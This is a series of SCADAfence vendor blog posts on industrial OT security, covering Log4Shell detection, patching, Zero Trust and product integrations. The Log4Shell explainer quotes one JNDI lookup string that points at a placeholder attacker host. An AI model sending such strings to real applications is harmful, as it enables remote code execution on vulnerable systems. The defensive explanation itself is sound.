Until two weeks ago, Log4j was just a popular Java logging framework, one of the numerous components that run in the background of many modern web applications. But since a zero-day vulnerability (CVE-2021-44228) was published, Log4j has made a huge impact on the security community as researchers found that it’s vulnerable to arbitrary code execution. 

The good news is that the Apache Software Foundation has already fixed and rolled out the patch for the vulnerability. On top of the patch, thanks to SCADAfence’s research and R&D team, our latest build supports the detection of Log4j exploit attempts.

Quick Recap of CVE-2021-44228 in Log4j

Log4J is an unauthenticated remote code execution (RCE, code injection) vulnerability in the popular Log4j logging framework for Java. By exploiting it, the attacker can easily execute any code from a remote source on the attacked target. NIST has given this vulnerability (CVE-2021-44228) a score of 10 out of 10, which reflects its criticality.

Over 3 billion devices run Java, and because there are only a handful of logging libraries, many of them are likely to run Log4j. Worse still, many internet-exposed target applications can be exploited by external users without authentication. 

Over the past two weeks, major OT vendors disclosed the security impact of this vulnerability on their software and equipment, and additional disclosures will continue as vendors work to identify the use of Log4j across their product lines. Originally, the Log4j vulnerability made it challenging to identify potentially impacted servers on a given network. For OT networks that have incorporated network segmentation, the risk from these protocols can be mitigated to an extent.

How To Ensure That Your Systems Are Safe

First, it’s important to understand that the root cause of this issue lies within the Log4j library. The Apache Software Foundation released an emergency patch for the vulnerability. You should upgrade your systems to Log4j 2.15.0 immediately or apply the appropriate mitigations.

Our OT security threat intelligence database learns about the different behavior to highlight activities attempting to leverage this vulnerability and to provide remediation guidance. Our customers are notified of log4j exploit attempts, and also on any anomaly detected by our anomalies engine. but our customers are already protected simply based on the efficacy of our anomaly detection.

The SCADAfence Platform, the Governance Portal, and the Multi-Site Portal do not use Log4J or the Apache server, and thus SCADAfence product installations are updated and secure from the Log4J vulnerability. Customers do not need to take action for any of our on-prem or hosted web solutions.

At SCADAfence, we felt network segmentation wasn’t enough to fight off the critical vulnerability. The latest build of the SCADAfence Platform detects and allows SCADAfence customers to leverage our OT security threat intelligence service to ensure they can patch and mitigate this exploit in any of their OT devices.

The SCADAfence Platform Detects & Alerts if an OT Asset is Vulnerable to the Log4Shell Vulnerability

We’ve updated our log4shells/log4j exploit detection inside the SCADAfence Platform as we have maneuvered ahead. We added CVE signatures to our database which detect and alert RCE (Remote Code Execution) exploits. 

The following CVEs were added to the SCADAfence database to correlate and alert of vulnerable OT assets: 

1. CVE-2021-44228   
2. CVE-2021-45046 
3. CVE-2021-4104
4. CVE-2020-9488
5. CVE-2019-17571
6. CVE-2017-5645

How Can You Deploy The Latest Version of SCADAfence

The latest version of the SCADAfence Platform which detects the CVE signatures relating to the vulnerability is available in build 6.6.1.167. To get the latest version, please contact your customer success representative.

If your organization is looking into securing its industrial networks, the experts at SCADAfence are seasoned veterans in this space and can show you how it’s done. 

To learn more about SCADAfence’s array of OT & IoT security products, and to see short product demos, click here: https://l.scadafence.com/demo

December 10, 2021, will always be remembered by the security community as the day when a highly critical zero‑day vulnerability was found in the very popular logging library for Java applications, log4j and identified as CVE-2021-44228. Not long after identified the name “Log4Shell” was coined for the exploit and every organization, no matter their size, including every security vendor, quickly rushed to mitigate the zero-day vulnerability within their applications. This patching marathon is still a work in process as we speak.  

Log4Shell is a critical vulnerability that requires urgent action. We can’t stress enough how important this Log4Shell vulnerability is. It’s a critical security vulnerability with a CVSS score of 10 that allows attackers to execute code remotely in any vulnerable environment. 

If you have not mitigated the Log4Shell vulnerability, we strongly recommend upgrading to the latest v2 version of Log4j which includes the recent vulnerability fix. You can find the mitigation process in Apache’s official Migration from Log4j v1 document. If you are unable to upgrade to the latest version, our research team recommends disabling JMSAppender or blocking any user input from reaching its configuration.

How the Log4Shell Vulnerability Works

The Log4Shell vulnerability targets the parts of Log4j that parse and log user-controlled data. Log4Shell allows attackers to exploit and compromise vulnerable applications. The vulnerability takes advantage of Log4j’s ability to use JNDI, the Java Naming and Directory Interface. By using JNDI lookups, an attacker can force the vulnerable application to connect to an attacker-controlled LDAP (Lightweight Directory Access Protocol) server and issue a malicious payload. Here is a visual diagram of the attack chain from the Swiss Government Computer Emergency Response Team.

To exploit a vulnerable target, attackers must trick the application code into writing a log entry that includes a string such as ${jndi:ldap://evil.xa/x}. Many applications logging is essential and a lot of different information is logged about every incoming request. While the vulnerability is affecting many attack vectors, until mitigation steps and the patch is complete no application or attack vector is safe from Log4Shell.

ICS/OT industry Response to Log4Shell

When the exploitation was first reported the ICS/OT industry didn’t think they were affected but now the ICS manufacturers are rushing to respond to Log4Shell.

Siemens confirmed that 17 of its products were affected by CVE-2021-44228 and that they have started to release patches and provide mitigation advice. Products confirmed to be affected include E-Car OC, EnergyIP, Geolus, Industrial Edge Management, Logo! Soft Comfort, Mendix, MindSphere, Operation Scheduler, Siguard DSA, Simatic WinCC, SiPass, Siveillance, Solid Edge, and Spectrum Power.

Additionally, Schneider Electric also released an advisory, but they announced they are still understanding which of their products are affected. Inductive Automation, which provides SCADA software and industrial automation solutions, announced that it conducted a full audit and determined that its products are not impacted.

While OT/ICS vendors are responding to Log4Shell and publishing advisories, this is not enough to ensure that OT environments and devices are secure against the Log4Shell vulnerability. Now that OT networks are becoming increasingly connected, the attack surface is widening, and increased risk is likely. But unlike in IT, OT environments have much more at stake. To ensure this vulnerability won’t cause more harm than needed, organizations should look into network segmentation in their OT environments. This will decrease the chance that their OT devices and networks will be exploited via the Log4Shell vulnerability. 

Too often, OT devices are outdated and don’t offer the latest version or upgrade which allows attackers to easily exploit an OT environment. In the case that OT vendors provide the latest patch or upgrade, organizations need to upgrade their OT technology. However, sometimes  OT teams won’t update their technology with the secure version due to their approach of “don’t fix what’s not broken”. This outdated and passive approach can result in the organization’s OT infrastructure becoming an easy target for attackers.  

SCADAfence’s OT Security is Here to Help

First of all, at SCADAfence we are here to assure you that all our products, The SCADAfence Platform for OT Security, the Governance Platform, and the Multi-Site Platform are updated and secure from the Log4Shell vulnerability. We remediated the Log4Shell vulnerability in our deployed application services’ code. Customers do not need to take action for any of our hosted web solutions.

The SCADAfence Platform Detects & Alerts if an OT Asset is Vulnerable to the Log4Shell Vulnerability

On top of ensuring that our products are secure, SCADAfence’s researchers analyzed the vulnerability and now the SCADAfence Platform detects and alerts if an OT asset is vulnerable with the Log4Shell zero-day vulnerability. SCADAfence customers can leverage our OT security threat intelligence service to ensure they can patch and mitigate this exploit in any of their OT devices.

On top of offering OT security threat intelligence, SCADAfence enables organizations to increase their visibility into their entire network as it’s difficult to protect what you can not see. Additional recommended practices are to adopt security network monitoring solutions that provide network segmentation and micro-segmentation as this will help organizations prevent similar exploitations moving forward. 

Still Patch, Patch, Patch 

Patching is still your best bet to combat this vulnerability. If patching isn’t possible, implementing mitigation techniques is the next best path to minimize the attack surface. SCADAfence’s research team is monitoring the evolution of this vulnerability and will provide additional information and support as needed. 

If your organization is looking into securing its industrial networks, the OT & IoT cyber security experts at SCADAfence are seasoned veterans in this space and can show you how it’s done. 

To learn more about SCADAfence’s array of OT & IoT security products, and to see short product demos, click here: https://l.scadafence.com/demo

The COVID-19 pandemic has been detrimental to the world economy while flattening many industries. The mining industry was fortunate to be one of the very few industries to deliver exceptional growth throughout this period. Yet this growth has marked the mining industry out as a lucrative target for cybercriminals.

Cybercrime has increased over the course of the pandemic as threat actors try to take advantage of the rapidly changing circum- stances, misinformation, and organizations’ shift to a hybrid workplace. The rewards for successful cyber-attacks are staggering. To put this in perspective, it is currently estimated that cyber-crime is worth more than the illegal drug trade globally, with billions of dollars paid out each year on ransomware. Cybercrime continues to accelerate and is expected to cost 10.5 trillion USD annually by 2025.

Cybercriminals are also becoming more innovative and creative as they target complex, business-critical Operational Technology (OT) environments, including Industrial Control Systems (ICS) and Supervisory Control And Data Acquisition (SCADA) systems.

Several high-profile attacks have demonstrated both the increasing sophistication of attacks and the devastating effects of a breach in these environments. In 2010 a malicious worm traveled for years to eventually find its SCADA target at an Iranian nuclear plant. More recently, in February 2021, a hacker attempted to poison the water supply of Oldsmar in Florida by using remote access to alter the levels of sodium hydroxide in the water. Though the attempt was thwarted, it illustrated the threat to industrial control systems1. Then in May, hackers successfully gained entry into the Colonial Pipeline Company network, which led to the shutdown of their 5,500-mile fuel pipeline, a shortage of petroleum in the USA and a ransom pay-out of $5.6 million3.

The rapid shift to remote work during the lockdown, and the consequential increase in cyber threats arising from the greater attack surface, have increased the demand for cybersecurity skills. Combined with the existing global shortage of cyber expertise, this demand means many organizations struggle to find and keep the people required to effectively manage security governance and operations across IT/OT environments. In response, we are now seeing increasing adoption of managed security services such as managed detection and response (MDR) solutions and vulnerability and threat identification tools designed specifically for OT systems.

Targeted mining attacks have the potential to affect four parts of operations: extraction, processing/refinement, stock management, and shipping. Each function presents a different set of risks that, if exploited, can reduce efficiency, inhibit operations, and cause financial turmoil. Given the extremely dangerous environments that mine sites present – heavy machinery, fumes, and explosives – the effect of a cyberattack on safety technologies such as wearables and gas detectors is possibly the most severe example.

Understanding the OT Environment 

Security analysts need to understand what is happening within OT systems with a unified system that monitors and assesses both OT and traditional IT environments. Complete coverage of an industrial mining network must include continuous monitoring of the components within the industrial network, such as programmable logic controllers or remote terminal units. Companies need to be continually monitoring governance and compliance aligned to industry good practice and ensuring coverage extends to IoT devices and machinery.

With such complex environments, many mining companies face an increasingly complex task to manage their cybersecurity. It is not uncommon to see companies procure half-a-dozen or more solutions. In fact, one study found 40% of organizations use 10 to 25 separate security tools, and 30% use 26 to 50 tools. This only adds to security teams’ burden. Furthermore, traditional security tools often don’t provide the required visibility into OT networks and devices that companies need to operate.

The key to managing this complexity and simplifying security is to bring network visibility, asset monitoring, vulnerability management, threat intelligence and threat detection into one solution. Security teams can focus on identifying, understanding, and remediating issues rather than managing data and tools. Tooling that is OT-specific and run by professionals who understand the nuances of OT environments is key.

Industry-leading OT security

At Rapid7, we know cyber security. We have two decades of experience in helping organizations advance their security postures and have assisted in increasing customers’ cyber security maturity. Our solutions are built to incorporate the change in modern environments, including the continued convergence of OT, and we offer clarity of risk, while helping secure your entire attack surface.

At Rapid7, we provide targeted threat detection through our External Threat Intelligence platform, allowing you to leverage tailored and actionable intelligence based on unique digital assets. This enables you to identify, block, and takedown attacks that directly target your industry and digital operations.

 For example, you can identify new malware kits and exploits that target production line equipment and/or OT devices or monitor hacker chatter to prioritize and lockdown vulnerabilities before they are exploited.

To expand the power of our solution in OT environments, we have partnered with the award-winning SCADAfence team to develop deep integrations between the two platforms to meet IT and OT security needs. Security teams now have a consolidated solution for IT, OT and IoT vulnerability management, threat intelligence, and incident detection and response.

SCADAfence is an industrial cybersecurity solution that provides visibility and monitoring for the mining industry’s OT & IoT networks. SCADAfence were recently recognized as Frost & Sullivan’s 2021 entrepreneurial company of the year, not to mention positioned as a Leader in the new Frost and Sullivan Radar for the Global Critical Infrastructure cyber security market. SCADAfence also won three coveted global infosec awards at RSA conference, including ICS/SCADA market leader.

SCADAfence’s solution automates asset discovery and inventory management, as well as threat detection and risk management. Remote access security capabilities enable security teams to track user activities and detect those that are outside the user profile or are malicious in nature.

By employing a wide range of algorithms, machine learning and AI, the platform detects anomalies and security events that can compromise availability and affect the safety and reliability of the OT network and its assets. A governance portal also measures compliance across all sites and identifies gaps or bottlenecks to help improve organizational security at scale.

SCADAfence provides 100% deep packet traffic inspection of all SCADA/ICS/IoT devices out of band, and offer a Governance and Compliance modules for ISO, NERC/CIP, EU and many other standard compliance models, providing a seamless reporting mechanism on the cyber security posture within OT environments. This ensures that reporting requirements align to your defined security frameworks.

A Consolidated Approach to Mining OT security

Rapid7 has integrated SCADAfence’s specialized OT monitoring with our industry-leading Insight platform to provide a comprehensive security solution without overwhelming your teams. The integration works bi-directionally and adds great security and manageability. Vulnerability data is collected from across the corporate IT and OT environments and provides visibility in a single interface for a comprehensive insight into IT/OT vulnerabilities.

Threats identified within the OT environment are communicated to teams via a central Security Information and Event Management (SIEM) solution (e.g. Rapid7’s InsightIDR). This, combined with the centralized vulnerability information, is what provides the single interface of all identified vulnerabilities and threats within the IT/OT environments.

The Rapid7 XDR solution (InsightIDR) ingests all your IT/OT threat data, as well as network traffic analysis (NTA), user behavior analytics (UEBA) and endpoint detection and response (EDR) data, to provide a complete view of your environment’s attack surface.

The XDR solution provides security teams with a single, centralized solution that can quickly identify malicious behavior across your entire environment.

In addition, with Rapid7 IntSights, our Threat Intelligence (TI) solution can also look for external threats from the clear, deep, and dark web, picking up industry targeted attacks, leaked company credentials, brand impersonation, executive impersonation and much, much more.

As a result, mining companies now have a single consolidated solution for IT/OT/IoT security, vulnerability management, threat intelligence, extended detection and response, and security orchestration and automation.

Opinion Disclaimier

The views and opinions expressed in this post are those of the author and do not represent the official policy or position of SCADAfence.

This article was orginally published in the Australian Mining Review and is authored by John Rice, Account Exectuve at Rapid7

The original post can be found here: https://australianminingreview.com.au/latest/#page=88

Thanksgiving – when families get together and express gratitude for everything they have over some food and hopefully some football. For most families and especially security teams, this is a time for looking back to evaluate the past year and to give thanks for how far we’ve come. 

When looking back at the past 12 months for the OT security community, it was a challenging year as the industry was bombarded with increasing amounts of successful ransomware attacks on industrial and critical infrastructure organizations. Instead of highlighting the attacks, we believe it’s better to focus on the different aspects of OT security that we are truly thankful for. 

Here at SCADAfence, we are grateful for all the efforts and innovation put in by our team and the collective OT security community. The sleepless nights and ongoing devotion to improving OT network visibility and security for industrial organizations is something everyone can be thankful for this thanksgiving. 

From the increasing awareness of IT-OT convergence to the US Government emphasizing the security risks that relate to OT environments, 2021 is a clear example that OT security is headed in the right direction and getting growing awareness by board members & C-level executives worldwide. 

As we look at last year and move forward, here are the 5 reasons why we are thankful for OT security. 

IT-OT Convergence

Just like on Thanksgiving, some family members might not see eye to eye at first but by the end of the night, everyone is happy and in agreement. This yearly experience is very relatable for security experts in IT and OT teams as they need to work together when it comes to the responsibility of OT security and converging networks.  

Up until recently, IT and OT teams rarely worked together as OT security teams were not in charge of advanced threats and IT security. With the advancement of operational technology and the adoption of industrial IoT devices, the need to converge IT and OT networks and systems is becoming more popular by the day with industrial organizations. 

With the increasing usage of IP-based communications with OT devices, there is a bigger challenge between IT & OT teams in understanding who is in charge of securing OT systems and this has created a cultural divide between teams. IT and OT teams’ technical barriers and lack of clear ownership are the key challenges why IT and OT teams are less open to working together. While the awareness of this challenge is increasing, we are seeing more organizations invest in technologies and governance platforms to ensure improved collaboration as they see that proper IT-OT convergence is a crucial aspect of their cyber security program.

Similar to families making up at the end of the Thanksgiving dinner, when IT & OT teams both come to the mutual table to wine and dine, it can result in improved visibility and transparency for an organization’s complete network security. At SCADAfence we have seen many of our customers adopt a seamless IT-OT convergence approach including one of the leading oil and gas organizations who are experiencing complete network visibility to all 71 of their global production sites.

OT Detection & Response

As industrial organizations become more interconnected, they potentially have more exposure to vulnerabilities. The high cost of industrial equipment and the damages to communities and economies that an attack could cause are key factors for organizations who are looking to protect their industrial networks. In addition, aging legacy equipment in factories, safety regulations that forbid any modifications being made to equipment and industry compliance regulations have created quite the challenge for OT teams.

Despite all of this, it is possible to secure industrial networks without disturbing regular operations and without risking non-compliance. By using OT security solutions that provide continuous threat detection and establishing the right security policies, OT security teams can put an effective OT strategy in place that will protect their organization’s processes, people and profit while significantly reducing security incidents and vulnerabilities.

Asset Inventory Management 

Effective cyber security in OT requires a deep foundation of asset information. Until recently OT teams didn’t have the resources or tools to maintain such an assets inventory. When organizations don’t deploy asset inventory management within an OT environment it creates a major visibility hole as they won’t know the security status of their environments. 

In some cases, industrial organizations will only create a simplified asset inventory to detect the data for security tasks. Organizations need to change their approach to asset inventory management and see it as the foundation of their OT security program.  

When detecting new vulnerabilities in OT networks and devices, organizations rely on their asset inventory to decide the severity of the vulnerability, how to patch the device and how it affects their environments. With an automated asset inventory, industrial organizations will increase the productivity and efficiency of their OT teams by quickly managing their assets data to detect and protect their environments all in one dashboard.  

Governance and Compliance 

Compliance regulations in OT are another aspect for security leaders to be thankful for as it is crucial for the security and production of industrial organizations. In recent years, there has been a growing demand for standards and guidelines to manage the risk exposure of OT infrastructures. IT and OT departments, who typically manage the cyber security standards across the organization, are now required to monitor the compliance of these standards across the various OT locations. On the other hand, the information provided today by the various IT tools is dispersed and is technical in nature. This makes the ability to translate them into risks and to prioritize actionable mitigations, very challenging and time-consuming. 

Organizations need to automate the governance processes with a solution that enables the IT and OT departments to centrally define and monitor the organizational adherence to organizational policies and to OT-related regulations. The solution should be configured and managed from a central location and aggregates compliance information from all sites in the organization. It also connects to other security systems, providing a cross-organizational, comprehensive compliance posture. 

OT Remote Access

Industrial organizations have undergone an evolution where most OT environments were isolated systems and now most OT systems are interconnected to the internet. This is occurring due to organizations deploying new technology that allows increased remote access management to OT systems. 

By providing remote access to OT systems it creates an advantage for industrial organizations but it also comes with more risks. By increasing the connectivity of OT systems and devices to the internet it can result in exploitation via cyber attacks. The constant increase of attacks on critical infrastructure and the convergence of IT and OT systems has quickly increased the adoption of remote access security in critical infrastructures and industrial organizations.

To fight off remote access security risks within OT environments, organizations need to deploy OT security solutions that come integrated with remote access features that are specifically designed for OT environments. By deploying an OT security platform that integrates remote access security that does not require any changes in network architecture, it will ensure that the OT systems are properly configured to detect and correlate remote user activity and detect if there is any malicious network activity.

Lastly, all of us at SCADAfence would like to thank our readers. It’s a privilege to share our passion for a subject with fellow security-minded folks. We wish everyone who’s celebrating a safe and happy Thanksgiving!

When organizations are seeking out the right cybersecurity controls for their OT environments and devices, the clear objective is to decrease and eliminate risks. Too often organizations only adopt the minimal level of security. While each organization defines its security risk levels, it is often based on their production environments, industrial devices and the critical risk factor of their facility production.

Many organizations will use different techniques to manage their risks, but one of the most common methods is patching. At the heart of every security strategy, patching is one of the key elements to securing any potential vulnerabilities within an organization. Despite patching being commonly used in risk management strategies, advancing patching for OT devices is still a work in progress.

Patch management in OT and Industrial Control Systems (ICS) comes with many security challenges. From lack of OT experts, proprietary hardware and software, compliance regulation reporting, minimal testing equipment and device and system maintenance, many industrial organizations struggle to clearly understand how they need to patch their vulnerable devices. This results in unmanaged patches.

Industrial Device Vulnerability Management Processes

When deciding what needs to be patched, security teams need to decide and evaluate the practicability of OT patching for their organization. With OT environments, applying patches is a balance that is based on the security benefits of what the patch provides versus the disruption of operational activities due to patching. These both are crucial factors to consider when patching OT environments.

With every standard OT security patching program, it starts with 4 steps to success. The first step is to detect and discover which assets you have within your OT environments. The next step is to assess the industrial devices and OT equipment for vulnerabilities. There can be different types of vulnerabilities but most vulnerabilities will fall under the categories of security risks or software and device misconfiguration.

The third step is to analyze and prioritize the vulnerabilities. Here is where organizations learn which devices are vulnerable and which are not and what priority should be assigned to patch the vulnerable devices. In some cases in this step, organizations will question should we even patch the vulnerability or why should we care about it? While it’s an organization’s job to decide what to patch and not to patch, we recommend patching all vulnerabilities to ensure the security of an organization will be secure. 

The fourth and final step is remediating the vulnerability. This is where security teams will patch the vulnerabilities within their industrial devices.  For example, patching a PLC, fixing device configurations and more. 

IT Patching Does Not Work in OT 

Today’s organizations need to run different security testing to clearly understand which vulnerabilities they have in their OT environments. In IT security, most organizations will adopt vulnerability scanning tools. With asset vulnerability scans, these are typically assessed based on port enumeration and authenticating to the devices to get comprehensive configuration/policy and registry information. While this might be useful for IT security it doesn’t work with OT security. 

For example, an automotive manufacturer in Germany had a couple of critical servers that were connected to their production line. Their servers crashed after scanning for vulnerabilities. They only scanned to see if they had one vulnerability in their environment. While they knew exactly what they were scanning for, it resulted in their OT environments being affected. The servers were a key part of their manufacturing process and the failure caused downtime and a loss of revenue of over a million dollars. 

When they investigated what the problem was, they identified that the scanner opened 13 sockets while the servers only supported up to four sockets in parallel. They flooded the servers with a capacity of three times higher than what was normal. The servers were unable to handle their operational processes and crashed. 

The lesson learned in this example is if you come with an IT security approach of scanning for vulnerabilities with OT, an organization might cause more damage than a cyber attack.

Don’t Forget about the Costs

Now that organizations know the four-step process of device patching management, the cost of patching is a crucial aspect they must be aware of. Once organizations have all the information (asset inventory, network mapping, disclosure sources and maps of vulnerabilities) and they are ready to patch the vulnerabilities they need to understand the price to patch. 

With each patching process, there is a different cost associated with it and it shouldn’t be taken lightly. Every industrial organization’s biggest nightmare is production downtime. With every patching process, the organization will experience some kind of downtime but when managed correctly, it will only be for a short period of time. However, when an organization doesn’t manage the industrial device management process correctly it can financially impact the organization not only in the production line but also in the headlines.  

At SCADAfence, we have helped many industrial organizations to patch their OT devices. One common theme we have seen is when we show the organization the different vulnerabilities, they go ahead and they only fix that vulnerability and don’t fix their entire vulnerable device. This is a huge problem because if an organization doesn’t fix the core issue of a vulnerability, it will be easy for attackers to find another vulnerability. Organizations need to patch the entire device to ensure no vulnerabilities are left behind. 

Industrial Device Patching Comes with Benefits  

Now that we explained the risks of the cost impact of improper patching methods, organizations should consider what are the benefits. While patching OT devices can be risky at times for devices and servers to crash which results in downtime, there is a real benefit to patching.  

One of the biggest benefits that organizations experience is having an asset inventory, this is a great place to start. Adopting an automatic asset inventory provides the most efficient and the most accurate method to visually manage an organization’s industrial devices and understand if there are vulnerabilities in those devices. By mapping vulnerabilities to assets, it will allow organizations to prioritize the patching of vulnerable devices and increase the visibility into the connection points of each device on the OT network. 

In addition, we recommend isolating vulnerable devices from the OT network. In some cases, some OT devices will have a vulnerability that does not have a patch available. This could result from the protocols of a specific industrial device having too lenient restrictions which would make the device more vulnerable. By isolating vulnerable devices it will help organizations from allowing attackers to move laterally within their OT environment.

Simplifying Industrial Device Management

Moving forward, organizations need to assume that there are always unpatched devices in their OT networks due to not being able to be patched or because they haven’t been patched yet. If organizations adopt a concrete industrial device patching management strategy it will allow their security teams to efficiently detect vulnerabilities and attacks early on before attackers exploit the devices.

To answer the question, “to patch or not to patch”, is not a simple yes or no answer. 

We recommend adopting an industrial device patching approach based on actual trial testing with different scenarios. By understanding real-time device data and vulnerability information it will allow organizations to prioritize their patching of industrial devices.

To learn more about industrial device patching, on November 10th at 11 am EST, Rapid7 and SCADAfence will host a joint webinar: The Comprehensive Guide to Industrial Device Patching. 

During the webinar, we will provide three excellent tools that will help you with the decision-making process if “to patch, workaround or do nothing.”

In 2021, the increasing number of cyber security attacks on major critical infrastructure operators grabbed the headlines. The successful attacks targeted different industrial sectors such as oil pipelines, food manufacturers, and water and wastewater facilities. Up until these attacks occurred, the media and the industrial sectors paid little attention to the cybersecurity of critical infrastructure. 

Now that organizations and analysts are increasing their awareness of the different risks and vulnerabilities with critical infrastructure and OT environments, it is becoming more visible and how impactful these risks have on our daily lives. The recent increase of attacks on the different industrial sectors is finally receiving attention including at the highest levels of several governments. 

In May 2021, the President of the United States Joe Biden issued an Executive Order on improving the nation’s cybersecurity with a clear focus on critical infrastructure. As stated, “The scope of protection and security must include systems that process data (information technology (IT) and those that run the vital machinery that ensures our safety (operational technology (OT).”

While this is a great first step into advancing OT security, it is simply not enough. The different risks are due to three key factors. First, more critical infrastructure operators are digitalizing their equipment and environments which is resulting in their organizations becoming more vulnerable to cyber attacks. Second, the trend of converging IT and OT to be more interconnected has resulted in IT exploitation which is affecting OT environments. Last but not least, cyber criminals and nation-state attackers are attacking more aggressively by adopting more sophisticated tactics to exploit industrial control systems (ICS).

The Growing OT Attack Surface 

As operational technology (OT) networks are becoming increasingly connected to an organization’s network infrastructure, older strategies such as ‘air gapping’ are no longer relevant or feasible. 

Many organizations think IT security best practices are the answer and will search for IT security solutions that could possibly integrate with their OT environments.  This is the wrong approach to gain visibility and threat detection into OT networks. OT networks need a specifically designed solution that can detect security risks to avoid the exploitation of critical infrastructure. By deploying the wrong kind of solution within an OT environment it can result in different problems occurring to the OT network such as downtime and false-positive alerts and more. 

Instead, organizations should deploy OT security solutions that are designed and integrated with Zero Trust capabilities. This is the idea of limiting access to users, devices and equipment without the proper identification and permissions. So how does the Zero Trust model relate to OT networks?  

Zero Trust For OT Networks

Diagram 01: The SCADAfence Einstein Baseline’s Sensitivity Dashboard 

The Zero Trust motto is “never trust, always verify” and this is especially true when creating security controls in OT networks and devices. 

Many OT devices and systems are still using un-encrypted and unauthenticated protocols. However, it’s not just the devices. Too often, OT teams are not open to the idea of connecting their once-isolated systems or PLCs to the Internet, despite those systems being implemented with encryption and authentication. As more IT and OT systems are opening their gates to connect to the Internet, the need to adopt the principle of less privilege is more aligned with the expanding threat landscape.

Organizations need to look at OT security solutions that can provide policy-based access for authorized users. This is the approach that only OT teams or other specific users should have access to OT environments. Simply put, only employees who need access to OT networks and devices to do their day-to-day job should have access. 

Enforcing access controls early on, which is based on the principle that no one should be able to connect unless authorized, will allow security teams to provide access once authorized. Each user and device access request needs to be verified and then, only if verified, the access will be granted to the authorized users.   

By implementing the Zero Trust security model with granular access authorization, it can guarantee organizations that the proper access is being granted in OT environments with an additional level of security. By restricting who has access to what network or device, the Zero Trust model will help minimize the attack surface of the increasing risks within an OT environment.  

Additionally enforcing MFA (multi-factor authentication) is another essential Zero Trust model capability for OT leaders to implement with role-based access. With MFA, access is only granted after successfully presenting two or more pieces of evidence, or factors, to an authentication mechanism. These factors will provide an additional layer of security against unauthorized access for OT environments. 

While the task to integrate the basic Zero Trust framework is not a simple task across complex environments like OT networks, rethinking a security approach with the Zero Trust framework is the right step in protecting critical infrastructure and OT environments. 

SCADAfence Offers Zero Trust Capabilities for OT Environments 

Diagram 02:  The SCADAfence Einstein Baseline’s Unique Zero Trust Capabilities

SCADAfence is the only OT security vendor offering an OT network security solution that integrates with the Zero Trust model for industrial environments. The SCADAfence Platform enables users to define access-group segmentation and to enforce Zero Trust capabilities in their OT networks. Users can gain full visibility of their production networks which are designed and supported by the Zero Trust security framework. 

With the industry-leading Einstein baseline, the SCADAfence Platform learns an entire industrial network in less than 2 days. This includes learning all traffic patterns, asset behavior and network subnets. The Platform is able to immediately send alerts on any anomalies or deviations from the normal network behavior.

When the Zero-Trust model is enabled in the Einstein baseline period, the Platform not only displays and alerts users of all the activities and devices on the network, but all network behaviors are treated as potentially malicious until further verified.

As we continue to advance our leading OT security platform with more security features and capabilities, SCADAfence users continuously have more flexibility to manage their OT environments. Our latest integration of Zero Trust capabilities, will guide users with an additional level of security from the baseline stage to the ongoing security management stage and onward. 

To learn more about SCADAfence’s Zero Trust capabilities for OT networks, schedule a demo with one of our experts here: https://l.scadafence.com/demo

CISOs and security teams face an uphill battle when it comes to detecting and mitigating ever more frequent and sophisticated cyber threats, especially in OT environments.

Cyber attackers are learning new tactics, getting more creative, and are becoming more relentless than ever to exploit industrial organizations. As seen in the Oldsmar water system attack and the Colonial Pipeline ransomware attack, adversaries are targeting IT and OT environments to inflict damage on organizations that can affect the daily lives of civilians.

Considering the evolving and ever-expanding threat landscape,security and incident response teams might be feeling lost at times when defending their OT networks. Even more so with the recent increasing convergence of IT and operational technology (OT) threats, industrial organizations are seeking new practices on how to leverage their existing IT security stack to address the new cyber threats that are targeting OT environments.

This is where SCADAfence and IBM QRadar have partnered together to create a joint integration to tackle OT security challenges. Now security teams who are using IBM QRadar can be provided with the required visibility and security for adopting advanced Industrial IoT and OT technologies. This new integration with QRadar allows users to simply integrate alerts from the SCADAfence Platform to their QRadar feed, as well as viewing it in a dedicated SCADAfence dashboard.

Diagram 01. The SCADAfence & IBM QRadar integration dashboard

Many industrial organizations count on IBM Security QRadar, an intelligent SIEM, to provide actionable threat intelligence to help detect and respond to security incidents that need to be mitigated. SCADAfence’s integration with IBM QRadar allows our joint customers to capitalize further on their current security stack, so they can have complete visibility into their OT networks with real-time alerts, all in one user-friendly dashboard.

Leveraging SCADAfence and IBM QRadar

CISOs and their organization are always looking to enable their IT and security teams to detect and respond to security incident events more efficiently, but they also want to simplify how to address the lack of visibility into the security of OT environments at the same time. At SCADAfence, we believe we can achieve more through collaboration and integrations. Organizations can leverage SCADAfence’s OT security platform and alerting with QRadar’s strengths across all their industrial OT and IIoT environments to provide complete OT visibility and threat detection to respond to security incidents all in one dashboard.

Diagram 02. The SCADAfence & IBM QRadar integration alerts dashboard

Complete OT Network Visibility 

SCADAfence’s leading OT security platform is configured to minimize any interruption to the normal operation of the customer environment and provides OT insights and produces risk management recommendations that are appropriate to your organization’s needs. This is accomplished by discovering the assets and their roles in the network which provides visibility into their behavior. With a wide range of algorithms and mechanisms, the SCADAfence Platform detects anomalies that can compromise security, safety and reliability.

Multi-Layered Approach to OT Defense

Easily integrate the benefits of the SCADAfence Platform to provide endpoint controls with behavioral indicators of compromise across endpoints and operational networks. This will allow IBM QRadar users to have the visibility to respond across IIoT and OT environments, all within a single dashboard. This integration empowers customers with SCADAfence’s OT security technology while providing the needed visibility into OT equipment.

Automated Asset Inventory 

The SCADAfence Platform allows IBM QRadar customers to automatically discover and continuously manage their entire asset inventory up to date with detailed information on all the devices connected to their OT networks. Regardless of the vendors and controllers deployed in the infrastructure, the platform automatically generates asset inventory without needing any prior knowledge.

Efficient Detection of Incidents

With IBM QRadar and SCADAfence, users can correlate network traffic behavior with host and user behaviors across multiple network areas. Easily surface critical events and detect incidents across machines and networks that would previously go completely undetected. Quickly react and precisely prevent further attack propagation with an automatic correlation of OT manipulation commands with compromised host indications.

Proactive Operational Insights

SCADAfence Platform continuously alerts IBM QRadar users of any abnormal behavior or configuration changes that may have an impact on their operations’ stability before it actually affects their operations. The SCADAfence platform utilizes the most advanced OT security technology to gain the most up-to-date industry insights, which helps provide users with better security alerts and recommendations on how to remediate today’s OT vulnerabilities that may impact your environment.

Diagram 03. The SCADAfence & IBM QRadar integration log activity dashboard

Discover the instant value of OT security in your QRadar environment. Mutual customers with an active subscription to SCADAfence can go to the IBM Security App Exchange and download SCADAfence Platform integration for IBM QRadar.

Over time, we have learned that we develop products not for our own innovation, but for you the customers, to help improve your OT security. In 2021, we were excited to launch three newly designed products that include many new features that will improve your OT security experience.

